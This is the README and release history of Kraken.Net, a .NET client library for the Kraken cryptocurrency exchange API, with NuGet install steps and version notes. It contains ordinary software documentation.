Kraken.Net
A .Net wrapper for the Kraken API as described on Kraken, including all features the API provides
Donations are greatly appreciated and a motivation to keep improving. KrakenExchange.Net
To get started with Kraken packages from the NuGet server. In the search box type 'KrakenExchange.Net' and hit enter. The KrakenExchange.Net package should come up in the results. After selecting the package you can then on the right hand side select in which projects in your solution the package should install. After you've selected all project you wish to install and use Kraken Kraken.Net will be installed in. After selecting the correct project type
Install-Package KrakenExchange.Net in the command line interface. This should install the latest version of the package in your project.
After doing either of above steps you should now be ready to actually start using Kraken.Net.
Getting started
After installing it's time to actually use it. To get started you have to add the Kraken.Net namespace:
using Kraken.Net;.
Kraken.Net provides two clients to interact with the Kraken API. The
KrakenClient provides all rest API calls. The
KrakenSocketClient provides functions to interact with the websocket provided by the Kraken API. Both clients are disposable and as such can be used in a
using statement.
Release notes
Version 1.4.3 - 04 mei 2021
- Added GetAvailableBalances endpoint
Version 1.4.2 - 28 apr 2021
- Updated CryptoExchange.Net
Version 1.4.1 - 19 apr 2021
- Fixed ICommonSymbol.CommonName implementation on KrakenSymbol
- Updated CryptoExchange.Net
Version 1.4.0 - 12 apr 2021
- Added GetWithdrawInfo endpoint
- Added authenticated SubscribeToOrderUpdates and SubscribeToOwnTradeUpdates subscriptions on socket client
Version 1.3.2 - 30 mrt 2021
- Updated CryptoExchange.Net
Version 1.3.1 - 01 mrt 2021
- Added Nuget SymbolPackage
Version 1.3.0 - 01 mrt 2021
- Added config for deterministic build
- Updated CryptoExchange.Net
Version 1.2.3 - 22 jan 2021
- Updated for ICommonKline
Version 1.2.2 - 14 jan 2021
- Updated CryptoExchange.Net
Version 1.2.1 - 22 dec 2020
- Added missing SetDefaultOptions for socket client
- Fixed symbol name check for ETH2.S/ETH
Version 1.2.0 - 21 dec 2020
- Update CryptoExchange.Net
- Updated to latest IExchangeClient
Version 1.1.9 - 11 dec 2020
- Updated CryptoExchange.Net
- Implemented IExchangeClient
Version 1.1.8 - 19 nov 2020
- Updated CryptoExchange.Net
Version 1.1.7 - 09 nov 2020
- Fix string values for order book checksum
Version 1.1.6 - 09 nov 2020
- Fixed symbol validation
- Added string value properties to orderbook for checksum validation
Version 1.1.5 - 08 Oct 2020
- Fixed withdraw endpoint
Version 1.1.4 - 08 Oct 2020
- Added withdraw method
- Fix close timestamp orders
- Added OrderMin property on pair
- Updated CryptoExchange.Net
Version 1.1.3 - 28 Aug 2020
- Updated CryptoExchange.Net
Version 1.1.2 - 12 Aug 2020
- Updated CryptoExchange.Net
Version 1.1.1 - 21 Jul 2020
- Added checksum validation for KrakenSymbolOrderBook
Version 1.1.0 - 20 Jul 2020
- Added two-factor authentication support
Version 1.0.8 - 21 Jun 2020
- Updated CryptoExchange
Version 1.0.7 - 16 Jun 2020
- Fix for KrakenSymbolOrderBook
Version 1.0.6 - 07 Jun 2020
- Updated CryptoExchange.Net to fix order book desync
Version 1.0.5 - 03 Mar 2020
- Fixed since parameter in GetRecentTrades endpoint
Version 1.0.4 - 27 Jan 2020
- Updated CryptoExchange.Net
Version 1.0.3 - 12 Nov 2019
- Added TradingAgreement parameter for placing orders for German accounts
Version 1.0.2 - 24 Oct 2019
- Fixed order deserialization
Version 1.0.1 - 23 Oct 2019
- Fixed validation length symbols
Version 1.0.0 - 23 Oct 2019
- See CryptoExchange.Net 3.0 release notes
- Added input validation
- Added CancellationToken support to all requests
- Now using IEnumerable<> for collections
- Renamed Market -> Symbol
- Renamed GetAccountBalance -> GetBalances
Version 0.0.4 - 15 Oct 2019
- Fixed placing orders
- Fixed possible missmatch in stream subscriptions
Version 0.0.3 - 24 Sep 2019
- Added missing order type, added missing ledger transfer types
Version 0.0.2 - 10 Sep 2019
- Added missing SetDefaultOptions and SetApiCredentials methods
Version 0.0.1 - 29 Aug 2019
- Initial release
|
https://curatedcsharp.com/p/net-wrapper-jkorf-krakennet/index.html
|
CC-MAIN-2022-40
|
refinedweb
| 678
| 54.59
|
PhoneGap on WP7 Tip #7: Marketplace tricks
This is a quick follow up tip to the last one I posted about using Trial Mode with a PhoneGap application on Windows phone.
As I mentioned in that article, having your application available for users to try without laying out any money is a great way to grab them as a customer. But successfully converting them is about more than just limiting the functionality. It’s about driving your desired behaviors for them. This can be prompting them to download your app, review it (good reviews are another key marketing tool in the marketplace) or even seeing other apps published by you in the marketplace.
Fortunately, there is an easy way to do this through the Marketplace tasks that are available to us. We will add a way to call those relevant tasks from PhoneGap by using the Marketplace Plugin from the previous article.
Revisiting the code from the previous article, we need to make a few changes. First, add this statement at the top of the marketplace.cs file.
using Microsoft.Phone.Tasks;
Then, add a wrapper for the task to show the detail in the Marketplace for the current application using the MarketplaceDetailTask class.
public void showInMarketplace(string args) { MarketplaceDetailTask _marketplaceDetailTask = new MarketplaceDetailTask(); _marketplaceDetailTask.Show(); }
This does not return a result to the calling JavaScript code, so you don’t need the DispatchCommandResult call as in the previous article.
Next up, a JavaScript wrapper in the marketplace.js file.
marketplace.prototype.showInMarketplace = function () { var args = {} PhoneGap.exec(null, null, "Marketplace", "showInMarketplace", args); }
A small change to the index.html page will let us provide the user with a way to quickly jump to the marketplace and buy the app.
function licenseCallback(isTrial) { if (isTrial) { licenseDiv.innerHTML = 'Trial mode, please <a onClick=window.plugins.marketplace.showInMarketplace();>buy me</a>!'; } else { licenseDiv.innerHTML = 'Thanks for buying!'; }
If you try this in the phone emulator, you’ll notice a few things. First of all, the marketplace entry won’t display and in fact you’ll get an error. That’s expected, as your app didn’t get installed on the emulator from the marketplace in the first place. Be assured it will certainly work once your app is published. Second, after you go to the marketplace and then press the back button to return to the app, you get prompted to simulate trial or full mode again. That’s not only expected, but by design. If a user upgrades to paid, when they come back to the app, we want to know then. Not when the app is restarted.
There are other useful marketplace functions, including:
- MarketplaceHubTask - Allows an application to launch the Windows Phone Marketplace client application.
- MarketplaceReviewTask - Allows an application to launch the Windows Phone Marketplace client application and display the review page for the specified product. This is an EXCELLENT way to encourage reviews, and good reviews are key to a prominent position in the marketplace!
- MarketplaceSearchTask - Allows an application to launch the Windows Phone Marketplace client application and display the search results from the specified search terms. You could search for other apps you’ve published by putting the app name or the publisher name in as a parameter to this call. Great for cross selling as in “Like this app? Try the my others!”
It’s easy to leverage the trial mode and the marketplace API in your PhoneGap apps on Windows Phone to get more purchases!
|
https://docs.microsoft.com/en-us/archive/blogs/glengordon/phonegap-on-wp7-tip-7-marketplace-tricks
|
CC-MAIN-2020-29
|
refinedweb
| 579
| 55.54
|
Using Python's finditer for Lexical Analysis
Fredrik Lundh wrote a good article called Using Regular Expressions for Lexical Analysis which explains how to use Python regular expressions to read an input string and group characters into lexical units, or tokens. The author's first group of examples read in a simple expression,
"b = 2 + a*10", and output strings classified as one of three token types: symbols (e.g.
a and
b), integer literals (e.g.
2 and
10), and operators (e.g.
=,
+, and
*). His first three examples use the
findall method and his fourth example uses the undocumented
scanner method from the
re module. Here is the example code from the fourth example. Note that the "1" in the first column of the results corresponds to the integer literals token group, "2" corresponds to the symbols group, and "3" to the operators group.
import re expr = "b = 2 + a*10" pos = 0 pattern = re.compile("\s*(?:(\d+)|(\w+)|(.))") scan = pattern.scanner(expr) while 1: m = scan.match() if not m: break print m.lastindex, repr(m.group(m.lastindex))
2 'b' 3 '=' 1 '2' 3 '+' 2 'a' 3 '*' 1 '10'
Since this article was dated 2002, and the author was using Python 2.0, I wondered if this was the most current approach. The author notes that recent versions (i.e. version 2.2 or later) of Python allow you to use the
finditer method which uses an internal
scanner object. Using
finditer makes the example code much simpler. Here is Fredrik's example using
finditer:
import re expr = "b = 2 + a*10" regex = re.compile("\s*(?:(\d+)|(\w+)|(.))") for m in regex.finditer(expr): print m.lastindex, repr(m.group(m.lastindex))
Running it produces the same results as the original.
Related posts
- (Not too successfully) trying to use Unix tools instead of Python utility scripts — posted 2011-04-20
- How to search C code for division or sqrt — posted 2008-07-24
- How to remove C style comments using Python — posted 2007-11-28
- Using Python's finditer to highlight search items — posted 2007-10-16
- Python finditer regular expression example — posted 2007-10-03
|
https://www.saltycrane.com/blog/2007/10/using-pythons-finditer-for-lexical/
|
CC-MAIN-2019-47
|
refinedweb
| 359
| 64
|
Blogs by Author & Date
A Shared Access Signature (SAS) is the primary means of authenticating a client when connecting to many Azure services. It is a (relatively) newer authentication scheme, replacing Access Control Service (ACS).
Even though SAS has been around for several years, the Azure SDK for PHP only supports ACS. There is an open issue to add SAS support to the SDK, but until that support is added, you will not be able to use the SDK if your Azure service does not have ACS enabled, and in the past few years, Microsoft has been defaulting services to not use ACS.
For a recent project, I needed to send messages to an Azure Service Bus queue from PHP code. My initial approach was to use the Azure SDK for PHP, as unfortunately, the documentation did not make it clear the SDK does not support SAS authentication.
I did not discover this fact until I tried authenticating in my code and received an error that the host mynamespace-sb.accesscontrol.windows.net could not be found.
The accesscontrol.windows.net indicates the SDK was trying to use ACS. I could have used a PowerShell command to enable ACS authentication for my Service Bus, but since Microsoft is encouraging SAS over ACS, I opted to create my own SAS routine for PHP.
I found .NET code for generating the token on MSDN, but one important factor when translating this code to PHP is that the .NET HttpUtility.UrlEncode function returns the hexadecimal encodings as lowercase letters (e.g. %2f) whereas PHP UrlEncode uses uppercase letters (%2F). This doesn’t usually matter, but it does matter when using the output for a hashing function.
The following code will generate a Shared Access Signature that can be used with Service Bus (and probably other Azure services as well):
function lower_urlencode($str) {
return preg_replace_callback('/%[0-9A-F]{2}/',
function(array $matches) {
return strtolower($matches[0]);
}, urlencode($str));
}
function generateSharedAccessSignature($url, $policy, $key) {
$expiry = time() + 3600;
$encodedUrl = lower_urlencode($url);
$scope = $encodedUrl . "\n" . $expiry;
$signature = base64_encode(hash_hmac('sha256', $scope, $key, true));
return "SharedAccessSignature sig="
. lower_urlencode($signature)
. "&se=$expiry&skn=$policy&sr=$encodedUrl";
}
$url references the endpoint you are trying to access, so if you’re trying to post to a queue, it would be e.g.
$policy is the name of the Shared access policy you want to use. You configure these within the Azure:
So for example, if I’m trying to use send a message to a queue, I could use the above sendmessage policy.
$key is the key associated with the policy, you can use either the primary or secondary:
Use the string returned from the generateSharedAccessSignature function as the value for the Authorization HTTP header.
One of the great features of Azure platform services such as Service Bus is that they are not tightly coupled to the Microsoft stack. In this case, using the above code, it was easy to send messages to a Service Bus queue using PHP.
Learn more about our Microsoft Azure Cloud Solutions and Services.
There are currently no comments, be the first to post one.
Name (required)
Notify me of followup comments via e-mail
|
https://www.dmcinfo.com/latest-thinking/blog/id/9467/categoryid/36/generating-an-azure-shared-access-signature-in-php
|
CC-MAIN-2018-34
|
refinedweb
| 529
| 51.28
|
On 05/18, Eric W. Biederman wrote:>> Oleg Nesterov <oleg@redhat.com> writes:>> >> I think there is something very compelling about your solution,> >> we do need my bit about making the init process ignore SIGCHLD> >> so all of init's children self reap.> >> > Not sure I understand. This can work with or without 3/3 which> > changes zap_pid_ns_processes() to ignore SIGCHLD. And just in> > case, I think 3/3 is fine.>> The only issue I see is that without 3/3 we might have processes that> on one wait(2)s for and so will never have release_task called on.>> We do have the wait loopYes, and we need this loop anyway, even if SIGCHLD is ignored.It is possible that we already have a EXIT_ZOMBIE child(s) whenzap_pid_ns_processes().> but I think there is a race possible there.Hmm. I do not see any race, but perhaps I missed something.I think we can trust -ECHILD, or do_wait() is buggy.Hmm. But there is another (off-topic) problem, security_task_wait()can return an error if there are some security policy problems...OK, this shouldn't happen I hope.> > And once again, this wait_event() + __wake_up_parent() is very> > simple and straightforward, we can cleanup this code later if> > needed.>> Yes, and it doesn't when you do an UNINTERRUPTIBLE sleep with> an INTERRUPTIBLE wake up unless I misread the code.Yes. so we need wait_event_interruptible() or __unhash_process()should use __wake_up_sync_key(wait_chldexit).> > Yes. This is the known oddity. We always notify the tracer if the> > leader exits, even if !thread_group_empty(). But after that the> > tracer can't detach, and it can't do do_wait(WEXITED).> >> > The problem is not that we can't "fix" this. Just any discussed> > fix adds the subtle/incompatible user-visible change.>> Yes and that is nasty.Agreed. ptrace API is nasty ;)> and moving detach_pid so we don't have to be super careful about> where we call task_active_pid_ns.Yes, I was thinking about this change too,> --- a/kernel/pid_namespace.c> +++ b/kernel/pid_namespace.c> @@ -189,6 +189,17 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)> rc = sys_wait4(-1, NULL, __WALL, NULL);> } while (rc != -ECHILD);>> + read_lock(&tasklist_lock);> + for (;;) {> + __set_current_state(TASK_INTERRUPTIBLE);> + if (list_empty(¤t->children))> + break;> + read_unlock(&tasklist_lock);> + schedule();OK, but then it makes sense to add clear_thread_flag(TIF_SIGPENDING)before schedule, to avoid the busy-wait loop (like the sys_wait4 loopdoes). Or simply use TASK_UNINTERRUPTIBLE, I do not think it is thatimportant to "fool" /proc/loadavg. But I am fine either way.Maybe you can also add "ifdef CONFIG_PID_NS" into __unhash_process(),but this is minor too.Oleg.
|
http://lkml.org/lkml/2012/5/21/178
|
CC-MAIN-2017-13
|
refinedweb
| 424
| 67.45
|
While all of the recent news has been focused on C# and Windows 10, F# isn’t standing still. Along with Visual Studio 2015 RC is the latest version of F# 4.0.
The first thing that should be noted is that it is truly a community project. Of the 38 contributors, only a quarter of them have any affiliation with Microsoft. All work was done in the open on the F# GitHub site, which is also where they would like feedback to be directed.
This release brings numerous changes to both the language and the runtime as well as a few IDE enhancements. You can see the full list on the F# blog, so we’re just going to hit the highlights.
Metaprogramming Support
Metaprogamming in .NET via expression trees has been a very important feature since the introduction of LINQ in .NET 4.0. With F# 4.0, working with expression trees is becoming easier than ever.
If you tag an argument of type FSharp.Quotations.Expr with the ReflectedDefinition attribute, the call site automatically switches to call-by-name semantics. Previously you would have to annotate the call site as shown in expressions 1 and 2 below. As shown in expression 3
Test.Expression1 ( <@ x + 1 @> ) //typed expression
Test.Expression2 ( <@@ x + 1 @@> ) //untyped expression
Test.Expression3 ( x + 1 ) //typed expression with ReflectedDefinition attribute
By eliminating the burden of explicitly quoting expressions, libraries that use metaprogramming techniques become much easier to work with.
Improved Preprocessor Directives
Believe it or not, until now F# had very limited support for preprocessor directives. Boolean operations such as “#if TRACE || DEBUG” were not possible until this version. The work-around for F# 3 and earlier is to use nested #if statements to simulate “and” expressions and duplicated code for “or” expressions.
Units of Measure
When working on scientific or engineering applications, errors often occur due to mistakes in units. For example, you may have one measurement in inches and another in meters. Back in 1999 this mistake caused the loss of the Mars Orbiter, a 125 million dollar space probe.
F# eliminates this class of bug through a concept known as units of measure. Scalar values become unit measurements by appending values with suffixes such as “<cm>” or “<miles/hour>”. As the next line shows, even conversions between units are expressed in terms of units of measure.
let cmPerInch : float<cm/inch> = 2.54<cm/inch>
The new feature for F# 4 is the ability to use fractional exponents in a unit of measure expression. For example:
[<Measure>] type Jones = cm Hz^(1/2) / W
Inheritance from types with multiple generic interface instantiations
This is a tricky one to understand if you aren’t familiar with F# and a frustrating one if you are. To begin with, let us consider a class that represents hexadecimal numbers. In C#, you may wish to design this class to be comparable to both strings and integers.
public class Hexidecimal : IComparable<string>, IComparable<int>
Due to the complex nature of F#’s type inference, it was previously unable to express this class. Not only can you not define a type with multiple interfaces that only differ by the type argument, you can’t inherit from one that does so either.
F# 4 doesn’t completely solve this problem but it does provide a workaround. You can now create two classes, one for each interface, and then have the second class inherit from the first. The code is a little tedious, but it is occasionally necessary when working with C# based libraries.
Extension properties in Object Initializers
Extension properties, a feature much desired in C#, are already available in F#. With this release, extension properties can now be used in object initializers.
Removing the Microsoft Brand
Following a tradition that dates back to Visual Basic 7, the language specific namespaces for F# all start with “Microsoft.FSharp”. But with F# being more community driven than Microsoft owned, this no longer seems appropriate and the Microsoft brand is being phased out.
>In this vein, to keep F# code itself vendor- and platform-neutral, the leading “Microsoft.” can now be optionally omitted when referring to namespaces, modules, and types from the FSharp.Core runtime.
Performance Improvement: Non-structural Comparisons
By default, F# uses structural comparisons instead of the types built-in operators such as op_Equality. While this makes performing complex data comparisons easy, performance can suffer.
When you desire the performance or semantics of the built-in comparison operators, you can now use “open NonStructuralComparison’ to change the way operators such as = work. In one simple benchmark comparing DateTime objects in a loop, the performance improvement was over an order of magnitude.
Script Debugging
Prior to VS 2015, F# developers had to choose between using F#’s interactive mode and having full access to the debugger. With this feature, you can now right-click on an F# script and run it under the debugger, thus getting the best of both worlds.
Intelligent Rebuilds
In VS 2013 and earlier, there was no way for Visual Studio to detect when an F# project needed to be built. So instead, F# projects were always rebuilt even when nothing changed. By adding “up-to-date” support in VS 2015, developers no longer have to wait for projects to be needlessly built.
Other features include improved Intellisense, interopt APIs for Option<T>, async workflow extensions for WebClient, and more.
Community comments
|
https://www.infoq.com/news/2015/04/FSharp-4/
|
CC-MAIN-2020-40
|
refinedweb
| 907
| 54.83
|
I;
65 comments:
Hi Jim,
I have tried using your code in my Program as Criteria , but its not working .
Thanks
@Pavan, can you elaborate? How do you know it isn't working? Are you getting an error message?
Jim - Thanks for your books and blog - solid stuff.
On a related note to this post, I have several step and path app package criteria working as expected. What I am struggling with is the 'definition criteria' for which i would expect a False return code to disable WF for the transaction assuming criteria is met. Now according to PBooks the definition criteria is 'used to determine which Definition ID is to be used to process the Approval'
So I am looking at either pointing to a definition that has no WF OR adding the criteria to every step...
Have you ever done something similar? Suggestion? Thanks in advance.
Jim - Following up on my own comment - Ii was able to continue researching and found oracle support ticket Is it Possible to Setup Approval Workflow to Work With Multiple Approval Definition IDs? [ID 1134294.1].
Essentially this boils down to the fact that you can have multiple definitions configured for each approval process - the logical path being active status, default definition and effective date. If you return a False code in the default it will continue to cycle through the the active definitions.
Thanks for letting me bounce the idea off of you, hopefully another reader finds this thread useful!
@Chris, thank you for sharing both the problem and resolution.
A "Well" developed work flow will allow definition criteria to select the right definition. I have, however, seen work flows that hard code the definition ID. Obviously, in that case, it won't cycle through the list of definitions. And, like you said, it iterates over the collection of definitions until it finds one that returns true.It is my experience that if none return true, it will fall silently... basically the case where there is no work flow.
Jim -
My current expectation is that returning False in from the approval definition criteria would bypass approval for the transaction as you stated. But this is not the case for me - a false return code continues to process the default definition...unless another definition is configured. Currently i have configured another definition that will always self-approve (or i can setup the second definition to bogus criteria) but it seems odd to have to configure this separately. Once i can come up for air, i will trace to find out why. Thanks again.
Chris
@Chris, what you are seeing is correct. If they all return false, then the default will be used. If there is no default, then there would be nothing to use.
Thanks again. What is your recommendation when in the following situation: IF the req has an origin of ONL then process WF else no workflow is required?
@Chris, I'm sure there are a dozen ways to solve this. Here are a couple that came to mind:
* self approve by having the approver user list return the logged in user.
* Auto approve in the OnProcessLaunch event.
Hi Jim:
I have a question related to AWE notifications for a specific event. Here is what I am encountering:
For the "Final Approval" event, I have configured three separate notifications to be generated -- all with the Participant = User List (different User Lists for each).
However, I have noticed that only the FIRST of the three notifications is being generated upon Final Approval. Is this an issue with how the AWE notifications execute or is there something that can be done within configuration to ensure delivery of all notifications?
Thanks!
@MattY, just to make sure I understand correctly... In the Transaction Configuration, do you have multiple rows with the same Event: "On Final Approval"? I can't say that I've tried that. I haven't looked into the code to see why it is behaving the way you described either. Perhaps there is an SQLExec in there to find rows by type rather than a loop? That would certainly behave the way you are describing. It would be nice if what you describe were supported. Perhaps an alternate method would be to create a query, app class, or SQL user list that combined all of three into a single user list? I'm sure you could make that work with an app class user list.
Thanks Jim. Yes - I have multiple rows in the Transaction Configuration for the same event.
The problem with combining the three different users into a single User List is that I have three different notifications that are being generated. Different content & different recipients for each.
We'll investigate to determine if we can incorporate a loop in the code so it will execute all the rows. Thx
Has anyone had success creating custom AWE Line Level Approval? I’m having trouble trying to get the OnLineApprove method to fire. I have header level working so I decided to dig deeper. I added the keys to the Xref table, Updated the Registry, Configured the Events, added the method to my event handler, and created a new Process Definition using line level (very simple “Always True”). I have seen OnProcessLaunch fire so my routing has begun. But when my approver hits the Approve button, it saves and nothing happens to the approval. Tracing it show that the method does not fire. How does the system know to fire the line level method vs the header level method? Any ideas are appreciated.
Thor
@Thor, I have not worked on line level approvals. You may want to post your question on the PeopleSoft General OTN Forum.
Thanks Jim, I just posted the question.
Hi Jim ,
First of all, let me tell you that your posts have been immensely helpful to all the peoplesoft developers out there. They are precise, to the point and very accurate. Thank You.
Now coming to my query....
How do we get the reference to step number in the “Check” method of App Package class which is used for evaluating the Step Criteria in a AWE transaction.
I need to run this criteria for all steps in advance when the user initially clicks on submit button.So I need something which tells me what is the step “Check ” method is currently evaluating …
In UserList Class, I am able to find the reference to Step Number by using this
/*get the current step*/
&nStepnbr = %This.step.step_nbr
I need something similar in Step Criteria App Package, i have tried numerous things but no use, kindly help me out .
@Kunal, a very good question. I do not know the answer off the top of my head. What I can't remember is the contents of the constructor &REC parameter and the check &bindRec parameter. You should print out the names of those records (log file or something). If the &bindRec has all of the header values, etc, then you could get a reference to the ApprovalManager which has an AppInst, stage and txn.
Please post back when you figure it out.
Jim,
Can we pass values to the class, like POI_ID. If yes, Can you please eloborate.
Thanks
Jim,
Can we pass parametes to the definition criteria or Can we capture the non keys from cross reference record. I need PO_ID, Is there any way, please elaborate.
@Satish, short answer to both questions is "yes." You do this through one of the two records passed into the constructor or the check method. Unfortunately, I like I told @Kunal, I can't remember what those record variables contain. I wish I had documented that piece. I recommend printing the record names. From there, you can determine the SQL needed to investigate the transaction records or xref values.
Hi Jim,
I used the code from your book 'webservice enabling approvals' to update the approval status using sync service. When there are multiple approval steps (this is Requisition process), only first step gets approved whereas the subsequent steps are updated to skipped and the Requisition status is updated to approved.
When approved from the online page, it is routed to the next step/ approver just fine.
Any pointers for me on what to look for?
@Srini, Congratulations on getting the web service working! I have only done header level approvals and have not looked into the line level approvals API.
Hi Jim,
I am doing header level approval too. But when there are multiple approval steps, first step is approved and the second one's status turns to skipped.
Whereas if I approve from the online page, it gets routed to second step just fine. I am not understanding what am I doing differently when I call doapprove?
Hello Jim,
First of all many thanks for the blog. Secondly, I'm working on Line level AWE. I need some help.
Suppose I've 5 lines for approval. 3 of them for level 1 approval and other two will undergo level 1 approval followed by level 2 approval.
On the second level approval page, I want to show only the 2 lines that need approval and the approval status of these two in monitor. Not for all the 5.
Please help me how it can be achieved.
Thanks,
Saurav
@Saurav, I have no experience with line level approvals. I suggest you post your question on the PeopleSoft OTN Discussion Forum.
Hi JIM,
Auto-approve is not working in one of our client after upgrading the tools from 8.52 to 8.53.
My process has "Auto Approval" checkbox enabled and "self approval" for that particular step is enabled with "Always True" criteria.
It's a line level approval.
Can you please help me??
@Pavan, I suggest you log a support case with Oracle support for something like this.
Thanks for the reply Jim.. Few days back i was facing problem in Self-approval.. the code you shared in this blog was very helpful...Thanks a lot for that..
JIM,
Gone through Chapter 3 i.e Workflow configuration.. it is very informative :)
@pavan, I am very glad that you find this information and the book content useful.
Hi Jim, I have a small problem with my AWE. I have two steps in my awe. When user creates a request the AWE got triggered to the Step1 userlist and the Monitor Showed clearly Step1: Pending and Step2:Not routed.
Then I went and logged in as the Step1 user and approved. But this time it dint trigger the Worklist to the second step userlist.
The thread status for this transaction is still in P Pending. The stepstatus for the first step is in Pending and for the second step it is N Notrouted.
Below is a snippet of my AWE component savepostchange code. Please help me , Am I missing anything.
import HMAF_AWE:ApprovalsFactory;
import HMAF_AWE:INTERFACES:ILaunchManager;
import HMAF_AWE:INTERFACES:IApprovalManager;
import HMAF_AWE:INTERFACES:IStatusMonitor;
import HMAF_AWE:*;
/*Declare local and component object variables*/
Local HMAF_AWE:ApprovalsFactory &AprvFactory;
Local HMAF_AWE:INTERFACES:IApprovalManager &AprvMgr;
Component HMAF_AWE:INTERFACES:IStatusMonitor &Monitor;
Local HMAF_AWE:INTERFACES:ILaunchManager &LaunchMgr;
/*Declare variables*/
Component Record &HDR_REC;
Component string &AprvProcId, &strAction;
/*GetHeader Rec*/
&HDR_REC = GetRecord(Record.MYHEADERRECORD);
&prcs_name = "MYPROCESSID";
Local string &Transaction_Name = &prcs_name;
Local Record &EOTransRec = CreateRecord(Record.EO_TRANSACTIONS);
&EOTransRec.TRANSACTION_NAME.Value = &prcs_name;
&EOTransRec.SelectByKey();
&AprvProcId = &EOTransRec.PTAFPRCS_ID.Value;
/*Create Approvals Factory*/
&AprvFactory = create HMAF_AWE:ApprovalsFactory();
/*Create launch manager object*/
&LaunchMgr = &AprvFactory.getLaunchManager(&AprvProcId, &HDR_REC, %OperatorId);
rem &LaunchMgr.DoSubmit();
/* Submit approval process */
/* create approval manager object */
If &strAction = "P" Then
If &LaunchMgr.hasAppDef And
&LaunchMgr.submitEnabled Then
&LaunchMgr.DoSubmit();
End-If;
&AprvMgr = &AprvFactory.getApprovalManager(&AprvProcId, &HDR_REC, %OperatorId);
Else
&AprvMgr = &AprvFactory.getApprovalManager(&AprvProcId, &HDR_REC, %OperatorId);
&ActionTaken = True;
Evaluate &strAction
When "A"
&AprvMgr.DoApprove(&HDR_REC);
Break;
When "D"
&AprvMgr.DoDeny(&HDR_REC);
Break;
When "B"
&AprvMgr.DoPushback(&HDR_REC); /***Push back***/
Break;
When-Other
&ActionTaken = False;
End-Evaluate;
End-If;
I have both the steps correctly configured
@Saeem, I don't see anything wrong with your code. You may want to post your question on the PeopleSoft General Discussion OTN Forum.
Hi Jim,
Thank You very much for the speedy reply. I made it work and now the worklist got triggered to the Second Level also.
I missed this piece of code
/*****/
If &ActionTaken Then
&appInst = &AprvMgr.the_inst;
&Monitor = &AprvFactory.getStatusMonitor(&appInst, "D", Null);
&strAction = " ";
End-If;
/******?
But Now a new problem has arised. When i try to access the link for the second level approver , nothing is happening the page is staying as it is. No action is happening, its not taking me to the approval page.
Buit for the first level approval this worklist link worked and took me to the Appr component.
Can you please help me where I should debug. Or am I missing something.
Thank You
Hi Jim,
Am I missing any configuration. I have the following foursteps configured in the transaction:
Onfinal Denial.
Onfinal Approval.
Route for Approval
and On Process Launch.
Should I include OnStepComplete.
@Saeem, only implement the methods you are actually using. If you don't have logic in OnStepComplete, then you should not implement it.
Hi Jim,
I have a question regarding Escalation Notifications in AWE. Normally escalations are set at the Path Level in AWE (via 'Details' on the path). Is it possible to apply Escalations on a Step level?
Thanks,
Tom
@Tom, great question. Unfortunately, I don't know the answer. I suggest you ask it on the PeopleSoft General OTN Forum.
Hi Jim,
I have followed exact same steps for AWE as you suggested in Book. But i am stuck in error "Class extends another, but has no constructor." I am posting same code here:
import PTAF_CORE:DEFN:UserListBase;
class WebAsset_ApprUserList extends PTAF_CORE:Defn:UserListBase
method WebAsset_ApprUserList(&rec_ As Record);
method GetUsers(&aryPrevOpr_ As array of string, &thread_ As Record)
Returns array of string;
end-class;
rem %Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
rem WebAsset_ApprUserList super= new &WebAsset_ApprUserList;
rem super = create PTAF_CORE:DEFN:UserListBase(&rec_);
rem create PTAF_CORE:DEFN:UserListBase(&rec_);
method WebAsset_ApprUserList
/+ &rec_ as Record +/
rem %Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
%Super = create PTAF_CORE:DEFN:UserListBase(&rec_);
end-method;
method GetUsers
/+ &aryPrevOpr_ as Array of String, +/
/+ &thread_ as Record +/
/+ Returns Array of String +/
/+ Extends/implements PTAF_CORE:DEFN:UserListBase.GetUsers +/
Local array of string &oprid_arr = CreateArrayRept("", 0);
Local SQL &admin_sql = CreateSQL("SELECT ROLEUSER " | "FROM PSROLEUSER WHERE ROLENAME = 'Portal Administrator'");
Local string &oprid; Local number &counter = 1;
While &admin_sql.Fetch(&oprid)
If (Mod(&counter, 2) = 0) Then
&oprid_arr.Push(&oprid);
End-If;
&counter = &counter + 1;
End-While;
Return &oprid_arr;
end-method;
Is this a 9.1 or later application? If so, try using the EOAW classes instead of PTAF classes. PTAF were only in 9.0 applications. Oracle renamed the AWE classes in 9.1 to EOAW. Likewise, change all of your other configurations, etc, to use the EOAW versions (including tables).
hi Jim,
Its 9.0 application only for Campus solution but tools are on 8.53.
Does that make any effect on coding of AWE??
Also i searched for EOAW but there are no packages like this name.
That is correct. There is no EOAW in Campus 9.0. I do not have experience with AWE in Campus 9.0. I have heard of customers using it in 9.0 Campus. You might try posting your question on the PeopleSoft OTN General discussion forum. Be sure to note your app and tools release when you post your question.
This looks Great...
I wish to create 1 user List App package ,
I have 7 User lists L1,L2,L3,L4 the SQL is the same except the Code type
I noticed in 8.54 there is a new thing called User List Attributes
So my thought is One app Package and Based on the Attribute in the user list perform I can adjust what I need to get done..
My Question .. How Do I get User List Attributes for that specific User list... Or even if i figure out the tables how do I get the Userlist ID that it is running..
Thanks
Hi Jim,
Can you please help me with this problem. I have my AWE configured and everything is working perfect except for the AWE monitor.
In my AWE monitor I am not able to expand the Comments section. Nothing happens when I click on the Comments expand button.
Please Help
@Saeem, you may need to file a support case for that.
Hi Jim,
We are configuring AWE for Absence management and we have bit different requirement,
We need to specify the job level depending on the Grade field to specify whether leave should be Auto Approved or workflow should be triggered.
IF Grade <300 then approval required
IF Grade >300 Then Auto approved
IF Grade C1,C2 then Approval required
IF Grade P1,P2 then Auto approved.
Can you please help me what is the best way we can achieve this?
I have tried using User entered criteria but it is not working for me.
Also can you help me how the peoplesoft system evaluates the User Enter criteria ?
@Jack, I wish I could, but I'm not familiar enough with that specific workflow to speak intelligently about it. I suggest posting your question on the PeopleSoft General OTN Forum
Hi Jim,
I have placed my query to General discussion forum. But no reply yet.
Anyways, If I want to try with custom app package then the suggestions you provided above, at which all other places I need to include/change peoplecode? I have never tried with app package so not sure how to do this.
It would be very helpful for me if you provide any example end to end.
Regards,
Rashmin.
@Jack/Rashmin, First you create your App Class in Application Designer and then you assign it in the criteria section. You do not need to change any delivered code. If you are new to Application Classes, then you may find value in my chapter on creating Application Classes.
Hi Jim,
First of all, Thanks a bunch for providing the such an informative book on peoplesoft..!!
Then Thanks to you for your quick help. I always find very helpful information on your blog.
Just one question came in my mind.
